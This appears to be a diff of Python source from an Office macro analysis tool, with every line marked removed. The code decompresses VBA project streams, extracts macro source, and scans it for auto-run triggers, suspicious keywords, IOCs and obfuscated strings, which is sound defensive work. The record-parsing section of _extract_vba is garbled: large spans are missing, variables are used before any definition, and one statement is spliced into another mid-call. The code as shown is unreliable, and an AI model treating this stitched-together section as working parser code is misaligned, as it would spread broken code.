- #MS-OVBA 2.4.1.3.12: the maximum size of a chunk including its header is 4098 bytes (header 2 + data 4096)
- # The minimum size is 3 bytes
- # NOTE: there seems to be a typo in MS-OVBA, the check should be with 4098, not 4095 (which is the max value
- # in chunk header before adding 3).
- # Also the first test is not useful since a 12 bits value cannot be larger than 4095.
- if chunk_flag == 1 and chunk_size > 4098:
- raise ValueError('CompressedChunkSize > 4098 but CompressedChunkFlag == 1')
- if chunk_flag == 0 and chunk_size != 4098:
- raise ValueError('CompressedChunkSize != 4098 but CompressedChunkFlag == 0')
-
- # check if chunk_size goes beyond the compressed data, instead of silently cutting it:
- #TODO: raise an exception?
- if compressed_chunk_start + chunk_size > len(compressed_container):
- log.warning('Chunk size is larger than remaining compressed data')
- compressed_end = min([len(compressed_container), compressed_chunk_start + chunk_size])
- # read after chunk header:
- compressed_current = compressed_chunk_start + 2
-
- if chunk_flag == 0:
- # MS-OVBA 2.4.1.3.3 Decompressing a RawChunk
- # uncompressed chunk: read the next 4096 bytes as-is
- #TODO: check if there are at least 4096 bytes left
- decompressed_container += compressed_container[compressed_current:compressed_current + 4096]
- compressed_current += 4096
- else:
- # MS-OVBA 2.4.1.3.2 Decompressing a CompressedChunk
- # compressed chunk
- decompressed_chunk_start = len(decompressed_container)
- while compressed_current < compressed_end:
- # MS-OVBA 2.4.1.3.4 Decompressing a TokenSequence
- # log.debug('compressed_current = %d / compressed_end = %d' % (compressed_current, compressed_end))
- # FlagByte: 8 bits indicating if the following 8 tokens are either literal (1 byte of plain text) or
- # copy tokens (reference to a previous literal token)
- flag_byte = compressed_container[compressed_current]
- compressed_current += 1
- for bit_index in range(0, 8):
- # log.debug('bit_index=%d / compressed_current=%d / compressed_end=%d' % (bit_index, compressed_current, compressed_end))
- if compressed_current >= compressed_end:
- break
- # MS-OVBA 2.4.1.3.5 Decompressing a Token
- # MS-OVBA 2.4.1.3.17 Extract FlagBit
- flag_bit = (flag_byte >> bit_index) & 1
- #log.debug('bit_index=%d: flag_bit=%d' % (bit_index, flag_bit))
- if flag_bit == 0: # LiteralToken
- # copy one byte directly to output
- decompressed_container += bytes([compressed_container[compressed_current]])
- compressed_current += 1
- else: # CopyToken
- # MS-OVBA 2.4.1.3.19.2 Unpack CopyToken
- copy_token = \
- struct.unpack("<H", compressed_container[compressed_current:compressed_current + 2])[0]
- length_mask, offset_mask, bit_count, _ = copytoken_help(
- len(decompressed_container), decompressed_chunk_start)
- length = (copy_token & length_mask) + 3
- temp1 = copy_token & offset_mask
- temp2 = 16 - bit_count
- offset = (temp1 >> temp2) + 1
- #log.debug('offset=%d length=%d' % (offset, length))
- copy_source = len(decompressed_container) - offset
- for index in range(copy_source, copy_source + length):
- decompressed_container += bytes([decompressed_container[index]])
- compressed_current += 2
- return decompressed_container
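The CopyToken decode step inside the loop above (MS-OVBA 2.4.1.3.19.2, Unpack CopyToken) can be sketched standalone; `unpack_copy_token` is a hypothetical name for illustration:

```python
import struct

def unpack_copy_token(copy_token, length_mask, offset_mask, bit_count):
    # Split the 16-bit token into a back-reference (offset into data
    # already decompressed in this chunk) and a copy length:
    length = (copy_token & length_mask) + 3
    temp1 = copy_token & offset_mask
    temp2 = 16 - bit_count
    offset = (temp1 >> temp2) + 1
    return offset, length

# Early in a chunk the offset field is 4 bits wide (bit_count=4,
# length_mask=0x0FFF, offset_mask=0xF000); token 0x7003, read
# little-endian from the stream, means "copy 6 bytes from 8 bytes back":
copy_token = struct.unpack('<H', b'\x03\x70')[0]
assert unpack_copy_token(copy_token, 0x0FFF, 0xF000, 4) == (8, 6)
```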
-
-
-def _extract_vba(ole, vba_root, project_path, dir_path, relaxed=False):
- """
- Extract VBA macros from an OleFileIO object.
- Internal function, do not call directly.
-
- vba_root: path to the VBA root storage, containing the VBA storage and the PROJECT stream
- vba_project: path to the PROJECT stream
- :param relaxed: If True, only create info/debug log entry if data is not as expected
- (e.g. opening substream fails); if False, raise an error in this case
- This is a generator, yielding (stream path, VBA filename, VBA source code) for each VBA code stream
- """
- # Open the PROJECT stream:
- project = ole.openstream(project_path)
- log.debug('relaxed is %s' % relaxed)
-
- # sample content of the PROJECT stream:
-
- ## ID="{5312AC8A-349D-4950-BDD0-49BE3C4DD0F0}"
- ## Document=ThisDocument/&H00000000
- ## Module=NewMacros
- ## Name="Project"
- ## HelpContextID="0"
- ## VersionCompatible32="393222000"
- ## CMG="F1F301E705E705E705E705"
- ## DPB="8F8D7FE3831F2020202020"
- ## GC="2D2FDD81E51EE61EE6E1"
- ##
- ## [Host Extender Info]
- ## &H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
- ## &H00000002={000209F2-0000-0000-C000-000000000046};Word8.0;&H00000000
- ##
- ## [Workspace]
- ## ThisDocument=22, 29, 339, 477, Z
- ## NewMacros=-4, 42, 832, 510, C
-
- code_modules = {}
-
- for line in project:
- line = line.strip().decode('utf-8','ignore')
- if '=' in line:
- # split line at the 1st equal sign:
- name, value = line.split('=', 1)
- # looking for code modules
- # add the code module as a key in the dictionary
- # the value will be the extension needed later
- # The value is converted to lowercase, to allow case-insensitive matching (issue #3)
- value = value.lower()
- if name == 'Document':
- # split value at the 1st slash, keep 1st part:
- value = value.split('/', 1)[0]
- code_modules[value] = CLASS_EXTENSION
- elif name == 'Module':
- code_modules[value] = MODULE_EXTENSION
- elif name == 'Class':
- code_modules[value] = CLASS_EXTENSION
- elif name == 'BaseClass':
- code_modules[value] = FORM_EXTENSION
-
- # read data from dir stream (compressed)
- dir_compressed = ole.openstream(dir_path).read()
-
- def check_value(name, expected, value):
- if expected != value:
- if relaxed:
- log.error("invalid value for {0} expected {1:04X} got {2:04X}"
- .format(name, expected, value))
- else:
- raise UnexpectedDataError(dir_path, name, expected, value)
-
- dir_stream = BytesIO(decompress_stream(dir_compressed))
-
- # PROJECTSYSKIND Record
- projectsyskind_id = struct.unpack("<H", dir_stream.read(2))[0]
- if projectname_sizeof_projectname < 1 or projectname_sizeof_projectname > 128:
- log.error("PROJECTNAME_SizeOfProjectName value not in range: {0}".format(projectname_sizeof_projectname))
- projectname_projectname = dir_stream.read(projectname_sizeof_projectname)
- unused = projectname_projectname
-
- # PROJECTDOCSTRING Record
- projectdocstring_id = struct.unpack("<H", dir_stream.read(2))[0]
- if projectdocstring_sizeof_docstring > 2000:
- log.error(
- "PROJECTDOCSTRING_SizeOfDocString value not in range: {0}".format(projectdocstring_sizeof_docstring))
- projectdocstring_docstring = dir_stream.read(projectdocstring_sizeof_docstring)
- projectdocstring_reserved = struct.unpack("<H", dir_stream.read(2))[0]
- if projecthelpfilepath_sizeof_helpfile1 > 260:
- log.error(
- "PROJECTHELPFILEPATH_SizeOfHelpFile1 value not in range: {0}".format(projecthelpfilepath_sizeof_helpfile1))
- projecthelpfilepath_helpfile1 = dir_stream.read(projecthelpfilepath_sizeof_helpfile1)
- projecthelpfilepath_reserved = struct.unpack("<H", dir_stream.read(2))[0]
- if projectconstants_sizeof_constants > 1015:
- log.error(
- "PROJECTCONSTANTS_SizeOfConstants value not in range: {0}".format(projectconstants_sizeof_constants))
- projectconstants_constants = dir_stream.read(projectconstants_sizeof_constants)
- projectconstants_reserved = struct.unpack(" 0:
- code_data = decompress_stream(code_data)
- # case-insensitive search in the code_modules dict to find the file extension:
- filext = code_modules.get(modulename_modulename.lower(), 'bin')
- filename = '{0}.{1}'.format(modulename_modulename, filext)
- #TODO: also yield the codepage so that callers can decode it properly
- yield (code_path, filename, code_data)
- # print '-'*79
- # print filename
- # print ''
- # print code_data
- # print ''
- log.debug('extracted file {0}'.format(filename))
- else:
- log.warning("module stream {0} has code data length 0".format(modulestreamname_streamname))
- except (UnexpectedDataError, SubstreamOpenError):
- raise
- except Exception as exc:
- log.info('Error parsing module {0} of {1} in _extract_vba:'
- .format(projectmodule_index, projectmodules_count),
- exc_info=True)
- if not relaxed:
- raise
- _ = unused # make pylint happy: now variable "unused" is being used ;-)
- return
-
-
-def vba_collapse_long_lines(vba_code):
- """
- Parse a VBA module code to detect continuation line characters (underscore) and
- collapse split lines. Continuation line characters are replaced by spaces.
-
- :param vba_code: str, VBA module code
- :return: str, VBA module code with long lines collapsed
- """
- # TODO: use a regex instead, to allow whitespaces after the underscore?
- vba_code = vba_code.replace(' _\r\n', ' ')
- vba_code = vba_code.replace(' _\r', ' ')
- vba_code = vba_code.replace(' _\n', ' ')
- return vba_code
-
-
-def filter_vba(vba_code):
- """
- Filter VBA source code to remove the first lines starting with "Attribute VB_",
- which are automatically added by MS Office and not displayed in the VBA Editor.
- This should only be used when displaying source code for human analysis.
-
- Note: lines are not filtered if they contain a colon, because it could be
- used to hide malicious instructions.
-
- :param vba_code: str, VBA source code
- :return: str, filtered VBA source code
- """
- vba_lines = vba_code.splitlines()
- start = 0
- for line in vba_lines:
-        if line.startswith("Attribute VB_") and ':' not in line:
- start += 1
- else:
- break
- #TODO: also remove empty lines?
- vba = '\n'.join(vba_lines[start:])
- return vba
-
-
-def detect_autoexec(vba_code, obfuscation=None):
- """
- Detect if the VBA code contains keywords corresponding to macros running
- automatically when triggered by specific actions (e.g. when a document is
- opened or closed).
-
- :param vba_code: str, VBA source code
- :param obfuscation: None or str, name of obfuscation to be added to description
- :return: list of str tuples (keyword, description)
- """
- #TODO: merge code with detect_suspicious
- # case-insensitive search
- #vba_code = vba_code.lower()
- results = []
- obf_text = ''
- if obfuscation:
- obf_text = ' (obfuscation: %s)' % obfuscation
- for description, keywords in AUTOEXEC_KEYWORDS.items():
- for keyword in keywords:
- #TODO: if keyword is already a compiled regex, use it as-is
- # search using regex to detect word boundaries:
- match = re.search(r'(?i)\b' + keyword + r'\b', vba_code)
- if match:
- #if keyword.lower() in vba_code:
- found_keyword = match.group()
- results.append((found_keyword, description + obf_text))
- return results
-
-
-def detect_suspicious(vba_code, obfuscation=None):
- """
- Detect if the VBA code contains suspicious keywords corresponding to
- potential malware behaviour.
-
- :param vba_code: str, VBA source code
- :param obfuscation: None or str, name of obfuscation to be added to description
- :return: list of str tuples (keyword, description)
- """
- # case-insensitive search
- #vba_code = vba_code.lower()
- results = []
- obf_text = ''
- if obfuscation:
- obf_text = ' (obfuscation: %s)' % obfuscation
- for description, keywords in SUSPICIOUS_KEYWORDS.items():
- for keyword in keywords:
- # search using regex to detect word boundaries:
- match = re.search(r'(?i)\b' + re.escape(keyword) + r'\b', vba_code)
- if match:
- #if keyword.lower() in vba_code:
- found_keyword = match.group()
- results.append((found_keyword, description + obf_text))
- return results
-
-
-def detect_patterns(vba_code, obfuscation=None):
- """
- Detect if the VBA code contains specific patterns such as IP addresses,
- URLs, e-mail addresses, executable file names, etc.
-
- :param vba_code: str, VBA source code
- :return: list of str tuples (pattern type, value)
- """
- results = []
- found = set()
- obf_text = ''
- if obfuscation:
- obf_text = ' (obfuscation: %s)' % obfuscation
- for pattern_type, pattern_re in RE_PATTERNS:
- for match in pattern_re.finditer(vba_code):
- value = match.group()
- if value not in found:
- results.append((pattern_type + obf_text, value))
- found.add(value)
- return results
-
-
-def detect_hex_strings(vba_code):
- """
- Detect if the VBA code contains strings encoded in hexadecimal.
-
- :param vba_code: str, VBA source code
- :return: list of str tuples (encoded string, decoded string)
- """
- results = []
- found = set()
- for match in re_hex_string.finditer(vba_code):
- value = match.group()
- if value not in found:
- decoded = binascii.unhexlify(value)
- results.append((value, decoded.decode('utf-8', 'backslashreplace')))
- found.add(value)
- return results
-
-
-def detect_base64_strings(vba_code):
- """
- Detect if the VBA code contains strings encoded in base64.
-
- :param vba_code: str, VBA source code
- :return: list of str tuples (encoded string, decoded string)
- """
- #TODO: avoid matching simple hex strings as base64?
- results = []
- found = set()
- for match in re_base64_string.finditer(vba_code):
- # extract the base64 string without quotes:
- value = match.group().strip('"')
- # check it is not just a hex string:
- if not re_nothex_check.search(value):
- continue
- # only keep new values and not in the whitelist:
- if value not in found and value.lower() not in BASE64_WHITELIST:
- try:
- decoded = base64.b64decode(value)
- results.append((value, decoded.decode('utf-8','replace')))
- found.add(value)
- except (TypeError, ValueError) as exc:
- log.debug('Failed to base64-decode (%s)' % exc)
- # if an exception occurs, it is likely not a base64-encoded string
- return results
-
-
-def detect_dridex_strings(vba_code):
- """
- Detect if the VBA code contains strings obfuscated with a specific algorithm found in Dridex samples.
-
- :param vba_code: str, VBA source code
- :return: list of str tuples (encoded string, decoded string)
- """
- from oletools.thirdparty.DridexUrlDecoder.DridexUrlDecoder import DridexUrlDecode
-
- results = []
- found = set()
- for match in re_dridex_string.finditer(vba_code):
- value = match.group()[1:-1]
- # check it is not just a hex string:
- if not re_nothex_check.search(value):
- continue
- if value not in found:
- try:
- decoded = DridexUrlDecode(value)
- results.append((value, decoded))
- found.add(value)
- except Exception as exc:
- log.debug('Failed to Dridex-decode (%s)' % exc)
- # if an exception occurs, it is likely not a dridex-encoded string
- return results
-
-
-def detect_vba_strings(vba_code):
- """
- Detect if the VBA code contains strings obfuscated with VBA expressions
- using keywords such as Chr, Asc, Val, StrReverse, etc.
-
- :param vba_code: str, VBA source code
- :return: list of str tuples (encoded string, decoded string)
- """
- # TODO: handle exceptions
- results = []
- found = set()
- # IMPORTANT: to extract the actual VBA expressions found in the code,
- # we must expand tabs to have the same string as pyparsing.
- # Otherwise, start and end offsets are incorrect.
- vba_code = vba_code.expandtabs()
- for tokens, start, end in vba_expr_str.scanString(vba_code):
- encoded = vba_code[start:end]
- decoded = tokens[0]
- if isinstance(decoded, VbaExpressionString):
- # This is a VBA expression, not a simple string
- # print 'VBA EXPRESSION: encoded=%r => decoded=%r' % (encoded, decoded)
- # remove parentheses and quotes from original string:
- # if encoded.startswith('(') and encoded.endswith(')'):
- # encoded = encoded[1:-1]
- # if encoded.startswith('"') and encoded.endswith('"'):
- # encoded = encoded[1:-1]
- # avoid duplicates and simple strings:
- if encoded not in found and decoded != encoded:
- results.append((encoded, decoded))
- found.add(encoded)
- # else:
- # print 'VBA STRING: encoded=%r => decoded=%r' % (encoded, decoded)
- return results
-
-
-def json2ascii(json_obj, encoding='utf8', errors='replace'):
- """ ensure there is no unicode in json and all strings are safe to decode
-
- works recursively, decodes and re-encodes every string to/from unicode
- to ensure there will be no trouble in loading the dumped json output
- """
- if json_obj is None:
- pass
- elif isinstance(json_obj, (bool, int, float)):
- pass
- elif isinstance(json_obj, str):
- # de-code and re-encode
- dencoded = json_obj
- if dencoded != json_obj:
- log.debug('json2ascii: replaced: {0} (len {1})'
- .format(json_obj, len(json_obj)))
- log.debug('json2ascii: with: {0} (len {1})'
- .format(dencoded, len(dencoded)))
- return dencoded
- elif isinstance(json_obj, bytes):
- log.debug('json2ascii: encode unicode: {0}'
- .format(json_obj.decode(encoding, errors)))
- # cannot put original into logger
- # print 'original: ' json_obj
- return json_obj.decode(encoding, errors)
- elif isinstance(json_obj, dict):
- for key in json_obj:
- json_obj[key] = json2ascii(json_obj[key])
- elif isinstance(json_obj, (list,tuple)):
- for item in json_obj:
- item = json2ascii(item)
- else:
- log.debug('unexpected type in json2ascii: {0} -- leave as is'
- .format(type(json_obj)))
- return json_obj
-
-
-_have_printed_json_start = False
-
-def print_json(json_dict=None, _json_is_last=False, **json_parts):
- """ line-wise print of json.dumps(json2ascii(..)) with options and indent+1
-
- can use in two ways:
- (1) print_json(some_dict)
- (2) print_json(key1=value1, key2=value2, ...)
-
- :param bool _json_is_last: set to True only for very last entry to complete
- the top-level json-list
- """
- global _have_printed_json_start
-
- if json_dict and json_parts:
- raise ValueError('Invalid json argument: want either single dict or '
- 'key=value parts but got both)')
- elif (json_dict is not None) and (not isinstance(json_dict, dict)):
- raise ValueError('Invalid json argument: want either single dict or '
- 'key=value parts but got {0} instead of dict)'
- .format(type(json_dict)))
- if json_parts:
- json_dict = json_parts
-
- if not _have_printed_json_start:
- print('[')
- _have_printed_json_start = True
-
- lines = json.dumps(json2ascii(json_dict), check_circular=False,
- indent=4, ensure_ascii=False).splitlines()
- for line in lines[:-1]:
- print(' {0}'.format(line))
- if _json_is_last:
- print(' {0}'.format(lines[-1])) # print last line without comma
- print(']')
- else:
- print(' {0},'.format(lines[-1])) # print last line with comma
-
-
-class VBA_Scanner(object):
- """
- Class to scan the source code of a VBA module to find obfuscated strings,
- suspicious keywords, IOCs, auto-executable macros, etc.
- """
-
- def __init__(self, vba_code):
- """
- VBA_Scanner constructor
-
- :param vba_code: str, VBA source code to be analyzed
- """
- if isinstance(vba_code, bytes):
- vba_code = vba_code.decode('utf-8', 'backslashreplace')
- # join long lines ending with " _":
- self.code = vba_collapse_long_lines(vba_code)
- self.code_hex = ''
- self.code_hex_rev = ''
- self.code_rev_hex = ''
- self.code_base64 = ''
- self.code_dridex = ''
- self.code_vba = ''
- self.strReverse = None
- # results = None before scanning, then a list of tuples after scanning
- self.results = None
- self.autoexec_keywords = None
- self.suspicious_keywords = None
- self.iocs = None
- self.hex_strings = None
- self.base64_strings = None
- self.dridex_strings = None
- self.vba_strings = None
-
-
- def scan(self, include_decoded_strings=False, deobfuscate=False):
- """
- Analyze the provided VBA code to detect suspicious keywords,
- auto-executable macros, IOC patterns, obfuscation patterns
- such as hex-encoded strings.
-
- :param include_decoded_strings: bool, if True, all encoded strings will be included with their decoded content.
- :param deobfuscate: bool, if True attempt to deobfuscate VBA expressions (slow)
- :return: list of tuples (type, keyword, description)
- (type = 'AutoExec', 'Suspicious', 'IOC', 'Hex String', 'Base64 String' or 'Dridex String')
- """
- # First, detect and extract hex-encoded strings:
- self.hex_strings = detect_hex_strings(self.code)
- # detect if the code contains StrReverse:
- self.strReverse = False
- if 'strreverse' in self.code.lower(): self.strReverse = True
- # Then append the decoded strings to the VBA code, to detect obfuscated IOCs and keywords:
- for encoded, decoded in self.hex_strings:
- self.code_hex += '\n' + decoded
- # if the code contains "StrReverse", also append the hex strings in reverse order:
- if self.strReverse:
- # StrReverse after hex decoding:
- self.code_hex_rev += '\n' + decoded[::-1]
- # StrReverse before hex decoding:
- self.code_rev_hex += '\n' + str(binascii.unhexlify(encoded[::-1]))
- #example: https://malwr.com/analysis/NmFlMGI4YTY1YzYyNDkwNTg1ZTBiZmY5OGI3YjlhYzU/
- #TODO: also append the full code reversed if StrReverse? (risk of false positives?)
- # Detect Base64-encoded strings
- self.base64_strings = detect_base64_strings(self.code)
- for encoded, decoded in self.base64_strings:
- self.code_base64 += '\n' + decoded
- # Detect Dridex-encoded strings
- self.dridex_strings = detect_dridex_strings(self.code)
- for encoded, decoded in self.dridex_strings:
- self.code_dridex += '\n' + decoded
- # Detect obfuscated strings in VBA expressions
- if deobfuscate:
- self.vba_strings = detect_vba_strings(self.code)
- else:
- self.vba_strings = []
- for encoded, decoded in self.vba_strings:
- self.code_vba += '\n' + decoded
- results = []
- self.autoexec_keywords = []
- self.suspicious_keywords = []
- self.iocs = []
-
- for code, obfuscation in (
- (self.code, None),
- (self.code_hex, 'Hex'),
- (self.code_hex_rev, 'Hex+StrReverse'),
- (self.code_rev_hex, 'StrReverse+Hex'),
- (self.code_base64, 'Base64'),
- (self.code_dridex, 'Dridex'),
- (self.code_vba, 'VBA expression'),
- ):
- if isinstance(code,bytes):
- code=code.decode('utf-8','backslashreplace')
- self.autoexec_keywords += detect_autoexec(code, obfuscation)
- self.suspicious_keywords += detect_suspicious(code, obfuscation)
- self.iocs += detect_patterns(code, obfuscation)
-
- # If hex-encoded strings were discovered, add an item to suspicious keywords:
- if self.hex_strings:
- self.suspicious_keywords.append(('Hex Strings',
- 'Hex-encoded strings were detected, may be used to obfuscate strings (option --decode to see all)'))
- if self.base64_strings:
- self.suspicious_keywords.append(('Base64 Strings',
- 'Base64-encoded strings were detected, may be used to obfuscate strings (option --decode to see all)'))
- if self.dridex_strings:
- self.suspicious_keywords.append(('Dridex Strings',
- 'Dridex-encoded strings were detected, may be used to obfuscate strings (option --decode to see all)'))
- if self.vba_strings:
- self.suspicious_keywords.append(('VBA obfuscated Strings',
- 'VBA string expressions were detected, may be used to obfuscate strings (option --decode to see all)'))
- # use a set to avoid duplicate keywords
- keyword_set = set()
- for keyword, description in self.autoexec_keywords:
- if keyword not in keyword_set:
- results.append(('AutoExec', keyword, description))
- keyword_set.add(keyword)
- keyword_set = set()
- for keyword, description in self.suspicious_keywords:
- if keyword not in keyword_set:
- results.append(('Suspicious', keyword, description))
- keyword_set.add(keyword)
- keyword_set = set()
- for pattern_type, value in self.iocs:
- if value not in keyword_set:
- results.append(('IOC', value, pattern_type))
- keyword_set.add(value)
-
- # include decoded strings only if they are printable or if --decode option:
- for encoded, decoded in self.hex_strings:
- if include_decoded_strings or is_printable(decoded):
- results.append(('Hex String', decoded, encoded))
- for encoded, decoded in self.base64_strings:
- if include_decoded_strings or is_printable(decoded):
- results.append(('Base64 String', decoded, encoded))
- for encoded, decoded in self.dridex_strings:
- if include_decoded_strings or is_printable(decoded):
- results.append(('Dridex string', decoded, encoded))
- for encoded, decoded in self.vba_strings:
- if include_decoded_strings or is_printable(decoded):
- results.append(('VBA string', decoded, encoded))
- self.results = results
- return results
-
- def scan_summary(self):
- """
- Analyze the provided VBA code to detect suspicious keywords,
- auto-executable macros, IOC patterns, obfuscation patterns
- such as hex-encoded strings.
-
- :return: tuple with the number of items found for each category:
- (autoexec, suspicious, IOCs, hex, base64, dridex, vba)
- """
- # avoid scanning the same code twice:
- if self.results is None:
- self.scan()
- return (len(self.autoexec_keywords), len(self.suspicious_keywords),
- len(self.iocs), len(self.hex_strings), len(self.base64_strings),
- len(self.dridex_strings), len(self.vba_strings))
-
-
-def scan_vba(vba_code, include_decoded_strings, deobfuscate=False):
- """
- Analyze the provided VBA code to detect suspicious keywords,
- auto-executable macros, IOC patterns, obfuscation patterns
- such as hex-encoded strings.
- (shortcut for VBA_Scanner(vba_code).scan())
-
- :param vba_code: str, VBA source code to be analyzed
- :param include_decoded_strings: bool, if True all encoded strings will be included with their decoded content.
- :param deobfuscate: bool, if True attempt to deobfuscate VBA expressions (slow)
- :return: list of tuples (type, keyword, description)
- (type = 'AutoExec', 'Suspicious', 'IOC', 'Hex String', 'Base64 String' or 'Dridex String')
- """
- return VBA_Scanner(vba_code).scan(include_decoded_strings, deobfuscate)
-
-
-#=== CLASSES =================================================================
-
-class VBA_Parser(object):
- """
- Class to parse MS Office files, to detect VBA macros and extract VBA source code
- Supported file formats:
- - Word 97-2003 (.doc, .dot)
- - Word 2007+ (.docm, .dotm)
- - Word 2003 XML (.xml)
- - Word MHT - Single File Web Page / MHTML (.mht)
- - Excel 97-2003 (.xls)
- - Excel 2007+ (.xlsm, .xlsb)
- - PowerPoint 97-2003 (.ppt)
- - PowerPoint 2007+ (.pptm, .ppsm)
- """
-
- def __init__(self, filename, data=None, container=None, relaxed=False):
- """
- Constructor for VBA_Parser
-
- :param filename: filename or path of file to parse, or file-like object
-
- :param data: None or bytes str, if None the file will be read from disk (or from the file-like object).
- If data is provided as a bytes string, it will be parsed as the content of the file in memory,
- and not read from disk. Note: files must be read in binary mode, i.e. open(f, 'rb').
-
- :param container: str, path and filename of container if the file is within
- a zip archive, None otherwise.
-
- :param relaxed: if True, treat mal-formed documents and missing streams more like MS office:
- do nothing; if False (default), raise errors in these cases
-
-        raises a FileOpenError if all attempts to interpret the data header failed
- """
- #TODO: filename should only be a string, data should be used for the file-like object
- #TODO: filename should be mandatory, optional data is a string or file-like object
- #TODO: also support olefile and zipfile as input
- if data is None:
- # open file from disk:
- _file = filename
- else:
- # file already read in memory, make it a file-like object for zipfile:
- _file = BytesIO(data)
- #self.file = _file
- self.ole_file = None
- self.ole_subfiles = []
- self.filename = filename
- self.container = container
- self.relaxed = relaxed
- self.type = None
- self.vba_projects = None
- self.vba_forms = None
- self.contains_macros = None # will be set to True or False by detect_macros
- self.vba_code_all_modules = None # to store the source code of all modules
- # list of tuples for each module: (subfilename, stream_path, vba_filename, vba_code)
- self.modules = None
- # Analysis results: list of tuples (type, keyword, description) - See VBA_Scanner
- self.analysis_results = None
- # statistics for the scan summary and flags
- self.nb_macros = 0
- self.nb_autoexec = 0
- self.nb_suspicious = 0
- self.nb_iocs = 0
- self.nb_hexstrings = 0
- self.nb_base64strings = 0
- self.nb_dridexstrings = 0
- self.nb_vbastrings = 0
-
- # if filename is None:
- # if isinstance(_file, basestring):
- # if len(_file) < olefile.MINIMAL_OLEFILE_SIZE:
- # self.filename = _file
- # else:
- # self.filename = ''
- # else:
- # self.filename = ''
- if olefile.isOleFile(_file):
- # This looks like an OLE file
- self.open_ole(_file)
-
- # if this worked, try whether it is a ppt file (special ole file)
- self.open_ppt()
- if self.type is None and is_zipfile(_file):
- # Zip file, which may be an OpenXML document
- self.open_openxml(_file)
- if self.type is None:
- # read file from disk, check if it is a Word 2003 XML file (WordProcessingML), Excel 2003 XML,
- # or a plain text file containing VBA code
- if data is None:
- data = open(filename, 'rb').read()
- # check if it is a Word 2003 XML file (WordProcessingML): must contain the namespace
- if b'http://schemas.microsoft.com/office/word/2003/wordml' in data:
- self.open_word2003xml(data)
- # store a lowercase version for the next tests:
- data_lowercase = data.lower()
- # check if it is a MHT file (MIME HTML, Word or Excel saved as "Single File Web Page"):
- # According to my tests, these files usually start with "MIME-Version: 1.0" on the 1st line
- # BUT Word accepts a blank line or other MIME headers inserted before,
- # and even whitespaces in between "MIME", "-", "Version" and ":". The version number is ignored.
- # And the line is case insensitive.
- # so we'll just check the presence of mime, version and multipart anywhere:
- if self.type is None and b'mime' in data_lowercase and b'version' in data_lowercase \
- and b'multipart' in data_lowercase:
- self.open_mht(data)
- #TODO: handle exceptions
- #TODO: Excel 2003 XML
- # Check if this is a plain text VBA or VBScript file:
- # To avoid scanning binary files, we simply check for some control chars:
- if self.type is None and b'\x00' not in data:
- self.open_text(data)
- if self.type is None:
- # At this stage, could not match a known format:
- msg = '%s is not a supported file type, cannot extract VBA Macros.' % self.filename
- log.info(msg)
- raise FileOpenError(msg)
-
- def open_ole(self, _file):
- """
- Open an OLE file
- :param _file: filename or file contents in a file object
- :return: nothing
- """
- log.info('Opening OLE file %s' % self.filename)
- try:
- # Open and parse the OLE file, using unicode for path names:
- self.ole_file = olefile.OleFileIO(_file, path_encoding=None)
- # set type only if parsing succeeds
- self.type = TYPE_OLE
- except (IOError, TypeError, ValueError) as exc:
- # TODO: handle OLE parsing exceptions
- log.info('Failed OLE parsing for file %r (%s)' % (self.filename, exc))
- log.debug('Trace:', exc_info=True)
-
-
- def open_openxml(self, _file):
- """
- Open an OpenXML file
- :param _file: filename or file contents in a file object
- :return: nothing
- """
- # This looks like a zip file, need to look for vbaProject.bin inside
- # It can be any OLE file inside the archive
- #...because vbaProject.bin can be renamed:
- # see http://www.decalage.info/files/JCV07_Lagadec_OpenDocument_OpenXML_v4_decalage.pdf#page=18
- log.info('Opening ZIP/OpenXML file %s' % self.filename)
- try:
- z = zipfile.ZipFile(_file)
- #TODO: check if this is actually an OpenXML file
- #TODO: if the zip file is encrypted, suggest to use the -z option, or try '-z infected' automatically
- # check each file within the zip if it is an OLE file, by reading its magic:
- for subfile in z.namelist():
- magic = z.open(subfile).read(len(olefile.MAGIC))
- if magic == olefile.MAGIC:
- log.debug('Opening OLE file %s within zip' % subfile)
- ole_data = z.open(subfile).read()
- try:
- self.ole_subfiles.append(
- VBA_Parser(filename=subfile, data=ole_data,
- relaxed=self.relaxed))
- except OlevbaBaseException as exc:
- if self.relaxed:
- log.info('%s is not a valid OLE file (%s)' % (subfile, exc))
- log.debug('Trace:', exc_info=True)
- continue
- else:
- raise SubstreamOpenError(self.filename, subfile,
- exc)
- z.close()
- # set type only if parsing succeeds
- self.type = TYPE_OpenXML
- except OlevbaBaseException as exc:
- if self.relaxed:
- log.info('Error {0} caught in Zip/OpenXML parsing for file {1}'
- .format(exc, self.filename))
- log.debug('Trace:', exc_info=True)
- else:
- raise
- except (RuntimeError, zipfile.BadZipfile, zipfile.LargeZipFile, IOError) as exc:
- # TODO: handle parsing exceptions
- log.info('Failed Zip/OpenXML parsing for file %r (%s)'
- % (self.filename, exc))
- log.debug('Trace:', exc_info=True)
-
- def open_word2003xml(self, data):
- """
- Open a Word 2003 XML file
- :param data: file contents in a string or bytes
- :return: nothing
- """
- log.info('Opening Word 2003 XML file %s' % self.filename)
- try:
- # parse the XML content
- # TODO: handle XML parsing exceptions
- et = ET.fromstring(data)
- # find all the binData elements:
- for bindata in et.getiterator(TAG_BINDATA):
- # the binData content is an OLE container for the VBA project, compressed
- # using the ActiveMime/MSO format (zlib-compressed), and Base64 encoded.
- # get the filename:
- fname = bindata.get(ATTR_NAME, 'noname.mso')
- # decode the base64 activemime
- mso_data = binascii.a2b_base64(bindata.text)
- if is_mso_file(mso_data):
- # decompress the zlib data stored in the MSO file, which is the OLE container:
- # TODO: handle different offsets => separate function
- try:
- ole_data = mso_file_extract(mso_data)
- self.ole_subfiles.append(
- VBA_Parser(filename=fname, data=ole_data,
- relaxed=self.relaxed))
- except OlevbaBaseException as exc:
- if self.relaxed:
- log.info('Error parsing subfile {0}: {1}'
- .format(fname, exc))
- log.debug('Trace:', exc_info=True)
- else:
- raise SubstreamOpenError(self.filename, fname, exc)
- else:
- log.info('%s is not a valid MSO file' % fname)
- # set type only if parsing succeeds
- self.type = TYPE_Word2003_XML
- except OlevbaBaseException as exc:
- if self.relaxed:
- log.info('Failed XML parsing for file %r (%s)' % (self.filename, exc))
- log.debug('Trace:', exc_info=True)
- else:
- raise
- except Exception as exc:
- # TODO: differentiate exceptions for each parsing stage
- # (but ET is different libs, no good exception description in API)
- # found: XMLSyntaxError
- log.info('Failed XML parsing for file %r (%s)' % (self.filename, exc))
- log.debug('Trace:', exc_info=True)
-
- def open_mht(self, data):
- """
- Open a MHTML file
- :param data: file contents in a string or bytes
- :return: nothing
- """
- log.info('Opening MHTML file %s' % self.filename)
